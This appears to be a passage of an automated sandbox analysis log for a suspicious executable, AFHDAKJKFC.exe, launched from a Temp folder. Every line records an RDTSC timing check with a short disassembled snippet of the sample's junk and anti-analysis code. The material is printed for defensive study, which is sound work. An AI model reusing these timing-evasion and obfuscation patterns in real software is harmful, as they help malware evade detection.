                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0A5 second address: 81B0A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0A9 second address: 81B0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0AF second address: 81B0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0B9 second address: 81B0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0CE second address: 81B0D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0D8 second address: 81B0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0DC second address: 81B0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B236 second address: 81B23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B23B second address: 81B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B525 second address: 81B529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820E4B second address: 820E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820E50 second address: 820E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81FC38 second address: 81FC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Dh 0x00000009 jbe 00007FAF7CBD5D36h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FAF7CBD5D3Bh 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81FC60 second address: 81FC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81FC67 second address: 81FC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FAF7CBD5D36h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81FC71 second address: 81FCA3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FAF7C6A41B8h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007FAF7C6A41B8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8200A5 second address: 8200AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8204B3 second address: 8204E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FAF7C6A41B2h 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 je 00007FAF7C6A41A8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a jo 00007FAF7C6A41A8h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8204E5 second address: 8204E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820660 second address: 820676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B2h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8207E9 second address: 8207ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8207ED second address: 8207F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8207F6 second address: 820806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jne 00007FAF7CBD5D36h 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820806 second address: 82080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82080C second address: 820818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820818 second address: 820835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FAF7C6A41B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7C9DFB second address: 7C9E04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7C9E04 second address: 7C9E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 820C79 second address: 820C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81F4AF second address: 81F4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jo 00007FAF7C6A41A6h 0x00000014 jmp 00007FAF7C6A41B2h 0x00000019 je 00007FAF7C6A41A6h 0x0000001f popad 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81F4E2 second address: 81F4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81F4E6 second address: 81F4EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 829C40 second address: 829C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E9D60 second address: 7E9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7E9D66 second address: 7E9D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7CBD5D46h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF7CBD5D3Bh 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA155 second address: 7EA199 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 1EF37087h 0x00000012 jmp 00007FAF7C6A41AFh 0x00000017 call 00007FAF7C6A41A9h 0x0000001c jo 00007FAF7C6A41B0h 0x00000022 jmp 00007FAF7C6A41AAh 0x00000027 push eax 0x00000028 jo 00007FAF7C6A41B0h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA199 second address: 7EA1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7CBD5D3Ch 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA1B2 second address: 7EA1BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF7C6A41A6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA2E0 second address: 7EA2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA2E6 second address: 7EA2EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA2EA second address: 7EA307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D41h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA307 second address: 7EA327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF7C6A41A6h 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA37F second address: 7EA383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA383 second address: 7EA387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA387 second address: 7EA3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FAF7CBD5D44h 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF7CBD5D38h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007FAF7CBD5D40h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAF7CBD5D46h 0x00000038 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA3F4 second address: 7EA3F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA3F8 second address: 7EA3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA526 second address: 7EA52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EADD2 second address: 7EAE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 ja 00007FAF7CBD5D43h 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2223h], esi 0x00000012 lea eax, dword ptr [ebp+1249088Eh] 0x00000018 jmp 00007FAF7CBD5D46h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FAF7CBD5D3Ch 0x00000026 jng 00007FAF7CBD5D36h 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EAE1C second address: 7EAE35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAF7C6A41A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FAF7C6A41A8h 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EAE35 second address: 7EAE84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FAF7CBD5D38h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D3746h] 0x0000002b lea eax, dword ptr [ebp+1249084Ah] 0x00000031 mov cx, 27ACh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007FAF7CBD5D38h 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EAE84 second address: 7EAE89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EAE89 second address: 7C9DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FAF7CBD5D40h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FAF7CBD5D38h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007FAF7CBD5D3Ah 0x0000002d call dword ptr [ebp+122D2522h] 0x00000033 pushad 0x00000034 js 00007FAF7CBD5D42h 0x0000003a jng 00007FAF7CBD5D36h 0x00000040 jnp 00007FAF7CBD5D36h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FAF7CBD5D45h 0x0000004d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82909A second address: 8290B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8290B7 second address: 8290BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8290BD second address: 8290C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8290C3 second address: 8290C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 829261 second address: 829275 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7C6A41A8h 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FAF7C6A41AEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 8293D9 second address: 8293DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 829538 second address: 82953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F07E second address: 82F082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F082 second address: 82F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F086 second address: 82F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FAF7CBD5D46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F0AD second address: 82F0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F3B3 second address: 82F3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 82F3B7 second address: 82F3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 838947 second address: 83894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83725F second address: 837265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83751A second address: 837538 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAF7CBD5D3Ch 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837829 second address: 83784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAF7C6A41A6h 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FAF7C6A41B5h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83784E second address: 837866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EA7E9 second address: 7EA7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837B15 second address: 837B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAF7CBD5D36h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837B1F second address: 837B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007FAF7C6A41CCh 0x00000013 jo 00007FAF7C6A41B2h 0x00000019 jc 00007FAF7C6A41A6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837B4F second address: 837B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FAF7CBD5D36h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837B5D second address: 837B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837CBB second address: 837CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837CBF second address: 837CE9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF7C6A41A6h 0x00000008 jmp 00007FAF7C6A41B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007FAF7C6A41A6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837CE9 second address: 837D19 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF7CBD5D3Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FAF7CBD5D36h 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAF7CBD5D47h 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 837D19 second address: 837D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83AE81 second address: 83AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF7CBD5D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 83AE91 second address: 83AE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
